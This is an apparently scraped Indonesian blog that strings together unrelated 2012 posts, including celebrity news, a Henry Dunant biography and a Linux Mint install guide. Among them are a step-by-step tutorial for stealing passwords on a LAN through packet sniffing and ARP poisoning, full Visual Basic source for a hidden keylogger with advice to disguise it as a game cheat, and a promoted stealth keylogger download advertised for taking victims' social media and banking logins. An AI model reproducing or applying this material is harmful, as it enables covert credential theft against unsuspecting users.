Cara mengubah baground gambar di folder

 Anda ingin merubah tampilan baground flasdish anda atau ingin merubah tampilan folder di komputer anda. Caranya sangat mudah dengan menggunakan IESHWIZ Background maker anda bisa mengubah tampilan sesuai keinginan anda. Download software nya ukuran cuma 52kb disini trus instal pada folder yang ingin anda rubah tampilanya. Pada Saat anda instal / Klik muncul tampilan seperti gambar 1 klik next.


Nah kemudian setelah anda klik tombl next tadi akan muncul tampilan seperti gambar diatas. Beri tanda centang pada kotak Modify baground. Kemudian klok tombol next.

Setelah anda klik tombol next tadi akan muncul tampilan seperti gambar diatas. Nah disini anda harus memastikan gambar yang ingin di jadikan baground tampilan foldernya dengan cara klik tombol browse kemudian pilih gambarnya. Untuk tombol text anda dapat merubat tampilan text nya sesuai keinginan anda. Setelah selesai klik tombol next.

Setelah anda klik tombol next akan muncul tampilan seperti diatas kemudian klik tombol finish. Kemudian ceck apakah berhasil?? apabila gambar tidak muncul coba anda keluar dari folder kemudian buka kembali. Apa yang terjadi tampilan folder berubah bagroundnya seperti punya saya dibawah ini sebagai contoh untuk anda.

Pendiri Facebook Mariied



Wed: Mark Zuckerberg and Priscilla Chan have married in a surprise ceremony in Palo Alto

Selain pelepasan saham perdana atau initial public offering alias IPO Facebook yang sudah ditunggu-tunggu sejak lama, di minggu ini juga terjadi peristiwa lain yang agak mengejutkan.

Pendiri Facebook Mark Zuckerberg menikahi kekasihnya, Priscilla Chan (27), dalam sebuah acara kecil yang dihadiri sekitar 100 tamu di kediaman Zuckerberg di Palo Alto, California, Amerika Serikat.

Meskipun sudah diam-diam merencanakan pernikahan selama lima bulan, pasangan ini berkata kepada tamu bahwa acara tersebut juga adalah pesta kejutan untuk merayakan kelulusan Chan dan ulang tahun Zuckerberg.

Para tamu diberi tahu bahwa pesta tersebut diadakan dalam rangka kelulusan Chan. Mereka terkejut begitu mengetahui bahwa ternyata acara itu adalah pernikahan Chan dan Zuckerberg.

Chan lulus dari Sekolah Kedokteran University of California San Francisco pada Senin, 14 Mei lalu, bertepatan dengan tanggal ulang tahun Zuckerberg yang ke-28.

Dalam acara, Zuckerberg menyerahkan cincin kimpoi dari ruby yang dirancangnya sendiri. Foto-foto pernikahan juga sudah di-upload ke akun Facebook miliknya.

Dua sejoli ini pertama kali bertemu di Harvard dan sudah berpacaran selama lebih dari 9 tahun. Pernikahan mereka seakan melengkapi rangkaian peristiwa bahagia bagi Zuckerberg dan Chan yang terjadi minggu ini.

Pemilihan tanggal pernikahan ini tidak terkait dengan IPO yang merupakan "target bergerak" dari perusahaan Facebook.

Photo Source

congratz and we wish you a happy life together forever

mimin kapan neh ??? apa maw nunggu IPO dolo


Spoiler for More Pic:

Status update: Mr Zuckerberg announced the news on his own personal Facebook page



Married: The couple have been together for nine years, but did not reveal their engagement



Performer: Billie Joe Armstrong, the lead singer for Green Day, arrived with his wife Adrienne in town and carrying a Gibson guitar. He provided entertainment for the newlyweds, playing 'My Last Night on Earth'



Couple: Ms Chan and Mr Zuckerberg met when they studied at Harvard and have been together ever since



Guests: Those invited thought they were attending a party to celebrate Ms Chan's graduation



Arrival: Guests were pictured turning up at the Palo Alto home on Saturday afternoon



Private: Mr Zuckerberg is known to be secretive about his personal life despite running a social network



Drinks: The Facebook founder ordered large amounts of alcohol in anticipation of the party



Flotation: Mr Zuckerberg opened trading on the Nasdaq on Friday, the day of Facebook's IPO




Spoiler for More Pic:

Married: Priscilla Chan became Mrs Mark Zuckerberg on Saturday when they wed at their home in Palo Alto



Affectionate: The couple have lived together since 2010 and first met while she was a freshman at Harvard in 2003



Supportive: Mr Zuckerberg, who had previously dropped out of Harvard to run his company, went back to campus for Chan's 2007 graduation



Boat trip: Zuckerberg and Priscilla , both wearing sunglasses in the centre of the picture, tour Ha Long Bay



Close: Priscilla allegedly has rules that for their relationship, mandating one date night per week



Formal affair: Priscilla posted a photo of she and Mark with The Washington Post's Don Graham and his wife Mary at the 2007 White House Correspondent's Dinner



oving: Mark Zuckerberg is pictured with his long-time girlfriend Priscilla Chan playing with their puppy



Girl and boy: Photos of the couple in their home show an interest in food



rick of treat: He kneels with his girlfriend who holds a bowl of Snickers and other chocolate bars on Halloween



Girlfriends: This is one of the few pictures of Ms Chan (far right) without Mr Zuckerberg



Child-centric: Ms Chan worked with kids as a fourth and fifth grade science teacher and wants to be a pediatrician




Sumber: KOMPAS.com

Hacking Jaringan Lan

Bagaimana cara hacking via LAN (mengintip password orang yang lagi browsing) ? Pertama-tama maaf kalau repost karena teknik ini bukanlah teknik yang fresh di dunia hacking tapi teknik ini belum basi karena sampai saat ini masih dapat digunakan karena sebagian besar jaringan meggunakan jaringan hub & switch yang tidak terenkripsi.
Mengapa tidak terenkripsi?
  • Network Admin sebagian besar adalah orang IT yang specialist dalam membuat program, bukan dalam Network Security
  • Bila dienkripsi bandwidth yang dibuthkan akan meningkat dan tentu inet yang sudah lemot ini akan semakin lemot dan akhirnya page error.
  • Harganya tidak murah untuk memperoleh yang terenkripsi
Perbedaan antara jaringan Hub dan Switch :
  • Pada jaringan hub semua data yang mengalir di jaringan dapat dilihat/diambil oleh komputer manapun yang ada di jaringan asalakan komputer tersebut merequest data tersebut, kalo tidak direquest ya tidak akan datang.
  • Pada jaringan switch hanya komputer yang melakukan pertukaran data yang dapat melihat data tersebut, komputer2 lain tidak berhak merequest data tersebut.
Masalahnya adalah harga dari router hub dan switch tidak berbeda jauh sehingga kebanyakan tempat sekarang sudah menggunakan metode switch yang menyulitkan untuk network hacking.
Hacking ini menggunakan teknik:
1. Sniffing
2. ARP Poison Routing
Kedua Teknik di atas tidak akan bisa dicegah oleh firewall apapun di komputer korban, dijamin.
Important Note: ARP Poison Routing dapat meyebabkan denial of service (dos) pada salah satu / semua komputer pada network anda.
Kelebihan:
  • Tidak akan terdeteksi oleh firewall tipe dan seri apapun karena kelemahannya terletak pada sistem jaringan bukan pada komputernya.
  • Bisa mencuri semua jenis login password yang melalui server HTTP.
  • Bisa mencuri semua login password orang yang ada di jaringan Hub selama program diaktifkan.
  • Untuk ARP Poisoning bisa digunakan untuk mencuri password di HTTPS.
  • Semua programnya free
Kekurangan:
  • Untuk jaringan Switch harus di ARP poisoning 1 persatu dan bandwidth anda akan termakan banyak untuk hal itu (kalo inet super cepat tidak masalah).
  • Ketahuan / tidak oleh admin jaringan di luar tanggung jawab saya
Mulai dari sini anggap bahwa di network dalam kasus ini ada 3 komputer, yaitu:
  1. Komputer Korban
  2. Komputer Hacker
  3. Server
Perbedaan-perbedaan antara jaringan Switch dan jaringan Hub :

Langkah-langkah pertama:
  1. Cek tipe jaringan anda, anda ada di jaringan switch / hub. Jika anda berada di jaringan hub bersyukurlah karena proses hacking anda akan jauh lebih mudah.
  2. Download program-program yang dibutuhkan yaitu Wireshark dan Cain&Abel.
Cara Menggunakan WireShark:
  1. Jalankan program Wireshark
  2. Tekan tombol Ctrl+k (klik capture lalu option)
  3. Pastikan isi pada Interfacenya adalah Ethernet Card anda yang menuju ke jaringan, bila bukan ganti dan pastikan pula bahwa "Capture packets in promiscuous mode" on
  4. Klik tombol start 
  5. Klik tombol stop setelah anda merasa yakin bahwa ada password yang masuk selama anda menekan tombol start 
  6. Anda bisa melihat semua jenis packet yang masuk dan keluar di jaringan (atau pada komputer anda saja jika network anda menggunakan Swtich
  7. Untuk menganalisis datanya klik kanan pada data yang ingin di analisis lalu klik "Follow TCP Stream" dan selamat menganalisis paketnya

  8. klik untuk memperbesar gambar
    Yang jelas dari data itu pasti di dalamnya terdapat informasi yang dimasukkan korban ke website dan sebaliknya
    nb: cara di atas hanya berlaku apabila jaringan anda adalah Hub bukan switch

    Dari cara di atas anda dapat mengetahui bahwa jaringan anda adalah hub/switch dengan melihat pada kolom IP Source dan IP Destination. Bila pada setiap baris salah satu dari keduanya merupakan ip anda maka dapat dipastikan jaringan anda adalah jaringan switch, bila tidak ya berarti sebaliknya.
    Cara Menggunakan Cain & Abel :

    Penggunaan program ini jauh lebih mudah dan simple daripada menggunakan Wireshark, tetapi bila anda menginginkan semua packet yang sudah keluar dan masuk disarankan anda menggunakan program Wireshark
  9. Buka program Cain & Abel anda
  10. Klik pada bagian configure 
  11. Pada bagian "Sniffer" pilih ethernet card yang akan anda gunakan
  12. Pada bagian "HTTP Fields" anda harus menambahkan username fields dan password fields nya apabila yang anda inginkan tidak ada di daftar.
    Sebagai contoh saya akan beritahukan bahwa jika anda ingin hack password Friendster anda harus menambahkan di username fields dan passworsd fields kata name, untuk yang lain anda bisa mencarinya dengan menekan klik kanan view source dan anda harus mencari variabel input dari login dan password website tersebut.
  13. Setelah itu apply settingannya dan klik ok
  14. Di menu utama terdapat 8 tab, dan yang akan dibahas hanya 1 tab yaitu tab "Sniffer" karena itu pilih lah tab tersebut dan jangan pindah dari tab tersebut untuk mencegah kebingungan anda sendiri
  15. Aktifkan Sniffer dengan cara klik tombol sniffer yang ada di atas tab-tab tersebut, carilah tombol yang tulisannya "Start/Stop Sniffer" 
  16. Bila anda berada pada jaringan Hub saat ini anda sudah bisa mengetahui password yang masuk dengan cara klik tab (Kali ini tab yang ada di bawah bukan yang di tengah, yang ditengah sudah tidak usah diklik-klik lagi) "Passwords" 
  17. Anda tinggal memilih password dari koneksi mana yang ingin anda lihat akan sudah terdaftar di sana
  18. Bila anda ternyata ada di jaringan switch, ini membutuhkan perjuangan lebih, anda harus mengaktifkan APR yang tombolonya ada di sebelah kanan Sniffer (Dan ini tidak dijamin berhasil karena manage dari switch jauh lebih lengkap & secure daripada hub)
  19. Sebelum diaktifkan pada tab sniffer yang bagian bawah pilih APR 
  20. Akan terlihat 2 buah list yang masih kosong, klik list kosong bagian atas kemudian klik tombol "+" (bentuknya seperti itu) yang ada di jajaran tombol sniffer APR, dll
  21. Akan ada 2 buah field yang berisi semua host yang ada pada jaringan anda
  22. Hubungkan antara alamat ip korban dan alamat ip gateway server (untuk mengetahui alamat gateway server klik start pada komputer anda pilih run ketik cmd lalu ketik ipconfig pada command prompt)
  23. Setelah itu baru aktifkan APR, dan semua data dari komputer korban ke server dapat anda lihat dengan cara yang sama.
Anda dapat menjalankan kedua program di atas secara bersamaan (Cain untuk APR dan wireshark untuk packet sniffing) bila ingin hasil yang lebih maksimal.
Password yang bisa anda curi adalah password yang ada di server HTTP (server yang tidak terenkripsi), bila data tersebut ada di server yang terenkripsi maka anda harus mendekripsi data tersebut sebelum memperoleh passwordnya (dan itu akan membutuhkan langkah-langkah yang jauh lebih panjang dari cara yang telah dijelaskan di atas)
Untuk istilah-istilah yang tidak Anda mengerti bisa Anda cari di Wikipedia. 

Cara Memasukan Keyloger Lewat Cheat

2 Cara Membuat Key Logger Dengan VB6 (Visual Basic 6.0)
CARA 1
Nie Gan,Ane dah lama tdk post skrng ane post.Ane Mw Kasih tw cara membuat keylogger dengan vb6
Udah Langsung Aja
Download Visual basic Nya Disini
Sc nya Juga Disini

Cara nya :
1.Buka VB
2.Pilih Standart .exe
3.Klik Kanan Form 1
4.Pilih View code Teruz Paste SC yg di download td ke View Code
5.Buat 1 text Box
6.Buat 1 Timer
7. Interval Timer nya diubah menjadi 1
Oh...Ya Supaya gak kelihatan kyk KeyLogger
Bikin Seperti Cheat Game Yang akan Kamu Buat
Contoh:
Cara Pakainya:
1.Buka Key Logger Yang Kamu Pakai
2.Biar kan Keylogger itu !
3.Sejak Kamu menulis ID & Password Key Logger Itu akan Menyalin ID & Password mu
Cheat Ini Hanya Untuk Komputer Terdekat
Dah....Selesai Dech....
Selamat Mencoba KeyLogger nya





Cara 2
Buka Visual Basic
Trus Paste Codenya Ke View Code Cara masuk ke viev code
Klik Kanan Form 1 ->View Code->Paste Code
Kasih Timer 1 interval 10

CODE
=========
Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer

Private Type TList
kode As Integer
bawah As String
atas As String
End Type

Private List(1 To 255) As TList
Private IndexList As Integer

Private Sub AddToTable(kode As Integer, atas As String, bawah As String)
IndexList = IndexList + 1
List(IndexList).kode = kode
List(IndexList).atas = atas
List(IndexList).bawah = bawah
End Sub

Private Sub Build_Table()
Dim i As Integer
For i = 65 To 90
AddToTable i, Chr(i), Chr(i + 32)
Next i
AddToTable 48, ")", "0"
AddToTable 49, "!", "1"
AddToTable 50, "@", "2"
AddToTable 51, "#", "3"
AddToTable 52, "$", "4"
AddToTable 53, "%", "5"
AddToTable 54, "^", "6"
AddToTable 55, "&", "7"
AddToTable 56, "*", "8"
AddToTable 57, "(", "9"
AddToTable &H60, "", "0"
AddToTable &H61, "", "1"
AddToTable &H62, "", "2"
AddToTable &H63, "", "3"
AddToTable &H64, "", "4"
AddToTable &H65, "", "5"
AddToTable &H66, "", "6"
AddToTable &H67, "", "7"
AddToTable &H68, "", "8"
AddToTable &H69, "", "9"
AddToTable Asc(" "), " ", " "

End Sub

Private Sub Form_Load()
Me.Visible = False
Build_Table
End Sub

Private Sub AddToFile(Isi As String)
Dim Data As String
Dim FileHandler As Long

If (Dir(App.Path & "\mylog.txt") <> "") Then
FileHandler = FreeFile
Open App.Path & "\mylog.txt" For Input As #FileHandler
Data = Input(LOF(FileHandler) - 2, #FileHandler)
Close #FileHandler
End If

FileHandler = FreeFile
Open App.Path & "\mylog.txt" For Output As #FileHandler
Print #FileHandler, Data & Isi
Close #FileHandler
End Sub

Private Sub Timer1_Timer()
Dim i As Integer
Dim a, b As Integer
For i = LBound(List) To UBound(List)
a = GetAsyncKeyState(List(i).kode)
b = GetAsyncKeyState(16)
If (a = -32767) Then
If (b = -32768) Then
AddToFile List(i).atas
Else
AddToFile List(i).bawah
End If
Exit For
End If
Next
End Sub
=========
Nah tinggal ganti icon nya,, ^^

New PeterpanBand Nama Baru Peter Pan



new peterpan band
Nama baru Peter Pan selalu ditunggu-tunggu oleh para penggemarnya. Sejak bergantinya nama fans menjadi ‘Feather Friend’ banyak yang menyangka bahwa Peter Pan akan berganti nama menjadi Feather Band. Namun, saat para personelnya menggelar soft launching New Concept Merchandise Store dan website, tercantum nama New Peterpan Band.
Menurut Uki, nama tersebut hanya nama sementara saja. Sedangkan nama yang baru akan diumumkan pada saat merilis album baru setelah album instrumental yang akan diluncurkan pada tanggal 29 Mei 2012 mendatang.
“Nama ini (New Peterpan Band) untuk nama sementara saja. Nama baru band kita akan diumumkan nanti bersama album baru setelah album instumental,” kata Uki seperti dirilis tribunnews.
Rencananya, pengumuman nama baru akan dilaksanakan sekitar bulan September 2012 atau di akhir tahun. Selain masih sibuk merilis album barunya, mereka juga menunggu kembalinya sang vokalis, Ariel. Dalam album baru yang bertajuk ‘Suara Lainnya’ itu, mereka menggunakan nama para personelnya.
“Nama band baru belum ada, untuk album instrumental pun kami pakai nama band dengan nama masing-masing personel,” tambah David.
Soft launching toko merchandise dan website itu sendiri digelar bersamaan dengan peringatan ulang tahun ke-3 Feather Friends Community, yang digelar di Jalan Sumbawa No 61, Bandung, Senin (14/5/2012). Adanya toko merchandise dan website tersebut diharapkan bisa mempererat hubungan antara fans dengan para personel band. Di toko itu mereka juga bisa mendapatkan koleksi DVD atau VCD serta segala macam pernik-pernik yang berbau band tersebut.

Hacking Destkop dengan Keylogger Pro V.5 mei 2012



SpyBoss KeyLogger Pro 4.2.3 Full Mediafire | 4.19 Mb

SpyBoss KeyLogger Pro 4.2.3 pal certainly all familiar with the words keylogger which is one of the most prominent hackers weapon and of course 100% works well to record all keyboard activity on the victim's computer. With all the activity keylogger keyboard work will be recorded automatically with no known casualties so hackers can take over all the data about our own personal accounts such as facebook, email, banking and other accounts.

4-Bang Full Premium Software
SpyBoss KeyLogger Pro 4.2.3 Features:
  • Secretly Monitor with this feature is certainly shared by every software keylogger, which monitors all activities or activities performed by the keyboard to steal the victim's information secretly.
  • Password Protection
  • this feature allows you to give the password on this keylogger software so that no one else can access or launch this software.
  • Stealth Mode
  • here's the best feature of this software. With this feature, you can hide this software for no one knows if you're using this leading software.
  • Encrypted Data Files
  • all data that has been stored will be encrypted with a secure, so if someone finds your log files, they still will not be able to read it. The log file can only be read using this software.
  • Email Log Files
  • with this you can send the log files from anywhere on the computer that has installed this keylogger to your email address.
  • Record Usernames And Passwords
  • with this feature you can steal usernames and passwords of the victim when they open a site like facebook, email, twitter and other sites that use the login / sign-ins.

Download Link:
MEDIAFIRE
http://www.mediafire.com/?cp92lhl93ar0g68

Free Download Grim Tales 2: The Legacy Collector's Edition [FINAL]


Grim Tales 2: The Legacy Collector's Edition [FINAL] PC Game Download
After being invited to the Christening of your sister’s son, you arrive to find a deserted estate in Grim Tales: The Legacy! After getting married to the love of her life, it seems like a happy ending is right around the corner for your sister. However, all is not well. The sounds of ravenous beasts echo through the halls of the once great estate and your sister is missing! Use your Hidden Object talents to track down her family and save them in Grim Tales: The Legacy!

The Collector’s Edition includes:
*Bonus gameplay
*Integrated Strategy Guide
*Stunning Soundtrack

Grim Tales 2: The Legacy Collector's Edition V2 [FINAL] | 852 MB
Or
Or
Or
Or

About Us

Contact Us

Facebook  : https://www.facebook.com/harisRTG

Twitter       : http://www.twitter.com/harisrezpect



Mail  : harispurnama09@gmail.com
          what_doyou09@yahoo.com

Mengenal Sosok Henry Dunant - Bapak Palang Merah Dunia

Jean Henri Dunant yang juga dikenal dengan nama Henry Dunant lahir 8 Mei 1828 – meninggal 30 Oktober 1910 pada umur 82 tahun, adalah pengusaha dan aktivis sosial warga negara Swiss juga dikenal sebagai Bapak Palang Merah Dunia. Dunant lahir di Jenewa, Swiss, putra pertama dari pengusaha Jean-Jacques Dunant dan istrinya Antoinette Dunant-Colladon. Keluarganya adalah penganut mashab Kalvin (Calvinist) yang taat serta mempunyai pengaruh yang signifikan di kalangan masyarakat Jenewa. Kedua orangtuanya menekankan pentingnya nilai kegiatan sosial. Ayahnya aktif membantu anak yatim-piatu dan narapidana yang menjalani bebas bersyarat, sedangkan ibunya melakukan kegiatan sosial membantu orang sakit dan kaum miskin. Dunant tumbuh pada masa kebangkitan kesadaran beragama yang dikenal dengan nama Réveil.

Pada usia 18 tahun, dia bergabung dengan Perhimpunan Amal Jenewa (Geneva Society for Alms Giving). Pada tahun berikutnya, bersama teman-temannya, dia mendirikan perkumpulan yang disebut ”Thursday Association”, sebuah kelompok anak muda tanpa ikatan keanggotaan resmi yang melakukan pertemuan rutin untuk mempelajari Bibel dan menolong kaum miskin. Waktu senggangnya banyak dia habiskan untuk mengunjungi penjara dan melakukan kegiatan sosial.

Pada tanggal 30 November 1852, Dunant mendirikan cabang YMCA di Jenewa. Tiga tahun kemudian, dia berpartisipasi dalam pertemuan Paris yang bertujuan membentuk YMCA menjadi sebuah organisasi internasional.

Pada tahun 1849, ketika berusia 21, Dunant terpaksa meninggalkan Kolese Kalvin (Collège Calvin) karena prestasi akademisnya buruk. Dia kemudian menjadi pekerja magang di perusahaan penukaran uang bernama Lullin et Sautter. Setelah masa magangnya selesai dengan prestasi baik, dia diangkat sebagai karyawan bank tersebut.

Pada tahun 1853, Dunant mengunjungi Aljazair, Tunisia, dan Sisilia karena ditugaskan oleh perusahaan yang melayani “wilayah-wilayah jajahan Setif”, yaitu perusahaan bernama Compagnie genevoise de Colonies de Sétif. Meskipun pengalamannya kurang, Dunant berhasil menyelesaikan penugasan tersebut dengan memuaskan.

Pada tahun 1859 Jean Henri Dunant melakukan perjalanan untuk urusan bisnis. Dunant tiba di Solferino pada petang hari tanggal 24 Juni 1859, tepat ketika pertempuran antara kedua pihak tadi baru saja selesai. Dia menyaksikan akibat-akibat dari Pertempuran Solferino, sebuah lokasi yang dewasa ini merupakan bagian Italia. Perang mengerikan antara pasukan Prancis dan Italia melawan pasukan Austria di Solferino, Italia Utara pada tanggal 24 Juni 1859. Tidak kurang 40.000 tentara terluka menjadi korban perang, sementara bantuan medis tidak cukup merawat korban sebanyak itu. Tergetar penderitaan tentara yang terluka, Henry Dunant bersama penduduk setempat mengerahkan bantuan menolong mereka. Sekembalinya ke Jenewa pada awal bulan Juli, Dunant memutuskan menulis sebuah buku tentang pengalamannya itu, yang kemudian dia beri judul Un Souvenir de Solferino (Kenangan Solferino). Buku ini diterbitkan pada tahun 1862 dengan jumlah 1.600 eksemplar, yang dicetak atas biaya Dunant sendiri. Henry Dunant mengajukan 2 gagasan. Pertama, membentuk organisasi kemanusiaan internasional yang dapat dipersiapkan pendiriannya pada masa damai untuk menolong prajurit yg terluka di medan perang. Kedua, mengadakan perjanjian internasional guna melindungi prajurit yg cedera dan sukarelawan serta organisasinya yg menolong saat terjadinya perang.

Pada 1863 Henry Dunant bersama keempat kawannya merealisasi gagasan tersebut dengan mendirikan komite internasional untuk nantuan para tentara yang cedera, sekarang disebut Komite Internasional Palang Merah atau Committee of The Red Cross (ICRC) merupakan lembaga kemanusiaan bersifat mandiri, sebagai penengah dan netral pada tahun 1863. Dalam perkembangannya Palang Merah Internasional juga memiliki Federasi Internasional Perhimpunan Palang Merah dan Bulan Sabit Merah atau International Federation of Red Cross dan Red Crescent (IFRC). Semangat Henry Dunant inilah yang mengilhami terbentuknya Perhimpunan Nasional Palang Merah Nasional dan Bulan Sabit Merah yang didirikan hampir di setiap negara di seluruh dunia berjumlah 176 perhimpunan nasional. Sedang gagasan kedua Henry Dunant direalisasi Pemerintah Swiss dengan mengadakan konferensi Jenewa dengan menghasilkan Konvensi Jenewa (1864) yang terus dikembangkan sehingga dikenal sebagai Konvensi Jenewa 1949.

Pada tahun 1901, Henry Dunant menerima Penghargaan Nobel Perdamaian yang pertama, bersama dengan Frédéric Passy. Jean Henri Dunant meninggal dunia pada tanggal 30 Oktober 1910, dan kata-kata terakhirnya ialah“Kemana lenyapnya kemanusiaan?” Sesuai keinginannya, Dunant dikuburkan tanpa upacara di Kompleks Pemakaman Sihlfeld di Zurich. Dalam surat wasiatnya, dia mendonasikan sejumlah uang untuk menyediakan satu “ranjang gratis” di panti jompo di Heiden tersebut, yang harus selalu tersedia untuk warga miskin kawasan itu. Dia juga memberikan sejumlah uang, melalui akte notaris, kepada teman-temannya dan kepada organisasi amal di Norwegia dan Swiss.

Hari ulang tahunnya, 8 Mei, dirayakan sebagai Hari Palang Merah dan Bulan Sabit Merah Sedunia (''World Red Cross and Red Crescent Day''). Panti jompo di Heiden yang dulu menampungnya itu sekarang menjadi Museum Henry Dunant. Di Jenewa dan sejumlah kota lain ada banyak sekali jalan, lapangan, dan sekolah yang dinamai dengan namanya. Medali Henry Dunant, yang dianugerahkan setiap dua tahun oleh Komisi Tetap Gerakan Palang Merah dan Palang Merah Internasional, merupakan penghargaan tertinggi yang dianugerahkan untuk Henry Dunant .


Demikian sepenggal Kisah Sejarah kehidupan Bapak Palang Merah Dunia "Henry Dunant" ,Semoga Bisa menginspirasi dan menambah wawasan Bersama  "

Tutorial Cara Instal Linux mint 12

Sebenarnya Linux Mint 12 dengan nama kode Lisa sudah dirilis sejak November tahun lalu tapi tak ada salahnya juga kalau baru mencobanya sekarang. Apalagi di tengah menurunnya popularitas Ubuntu, Linux Mint sepertinya tampil menjadi idola baru para pengguna Linux. Salah satu alasan semakin populernya Linux Mint tidak lepas dari keputusan pengembangnya untuk mempertahankan antarmuka Gnome 2.x yang dianggap klasik dengan tetap mengadopsi Gnome 3 dengan antarmuka shell. Di rilis ke-12, Linux Mint menyertakan beberapa fitur unggulan untuk mengakomodasi kebutuhan user yang kelihatannya kurang cocok dengan Gnome Shell.
Fitur-fitur baru yang disertakan di Linux Mint 12 di antaranya:

Proses instalasi kelihatannya juga mendapatkan polesan yang cukup baik. Dengan memilih opsi partisi harddisk secara otomatis, total langkah instalasi hanya tujuh tahap. Dan sebelum mencoba Gnome 3, MGSE, dan MATE, proses instalasi inilah point pertama review di artikel ini.
  1. Klik ikon Install Linux Mint di desktop untuk memulai instalasi. Tahap pertama pilih bahasa yang akan digunakan, klik Continue untuk melanjutkan.
  2. Kebutuhan minimum ruang kosong untuk instalasi Linux Mint sebesar 6 GB. Jaringan sengaja diputuskan supaya tidak memperlambat instalasi.Klik Continue untuk melanjutkan.
  3. Untuk alasan kecepatan, partisi akan dilakukan otomatis. Pilihan yang digunakan 'Erase disk and install Linux Mint'. Jika sudah ada data dan sistem operasi lain di harddisk, jangan menggunakan pilihan ini. Lanjut dengan klik Continue.
  4. Jika harddisk di PC/laptop hanya ada satu, langsung saja lanjut dari sini. Sebaliknya, pilih salah satu harddisk yang akan digunakan. Lalu klik Continue.
  5. Bagian ini cukup menarik, ketika proses salin dari DVD/CD ke harddisk sedang berlangsung, user tetap bisa melakukan konfigurasi. Salah satunya konfigurasi zona waktu. Sayangnya hanya berhenti sampai di sini, akan lebih menarik kalau konfigurasi lain bisa dilakukan selama user menunggu proses salin.
  6. Pilih keyboard layout. Klik Continue untuk melanjutkan.
  7. Konfigurasi terakhir sebelum proses instalasi dimulai, tentukan hostname, username dan password untuk sistem baru ini. Klik Continue untuk melanjutkan instalasi.
  8. Proses instalasi akan memakan waktu hingga setengah jam.
  9. Klik Restart Now untuk menyelesaikan instalasi dan me-restart komputer ke Linux Mint 12.
Saat pengguna log in untuk kali pertama, Linux Mint 12 akan menampilkan 'Welcome Screen' berisi dokumentasi, panduan pengguna, tutorial, tautan ke catatan rilis, forum, dll.
Pilihan desktop environment yand disediakan di versi DVD cukup beragam, mulai dari Gnome 3, Gnome Classic, hingga MATE yang masih berstatus eksperimen.
MATE adalah Gnome 2 yang di-fork dengan kompatibilitas dengan Gnome 3. Antarmuka yang ditawarkan persis seperti Linux Mint versi sebelumnya.
Tampilan Gnome 3 dan Gnome Classic di Linux Mint 12 kelihatannya sangat persis. Gnome 3 yang dipakai Linux Mint memang berbeda dengan Gnome 3 di distro Linux lainnya. Alih-alih menggunakan Gnome Shell, developer Linux Mint menyediakan Mint Gnome Shell Extension (MGSE) untuk mempermak tampilan Gnome 3 menjadi mirip Gnome 2.
Melihat penampilah Linux Mint yang semakin ciamik tidak salah kalau popularitas Ubuntu, setidaknya di DistroWatch, sudah tertinggal.
 
Selamat Mencoba :))
Related Posts Plugin for WordPress, Blogger...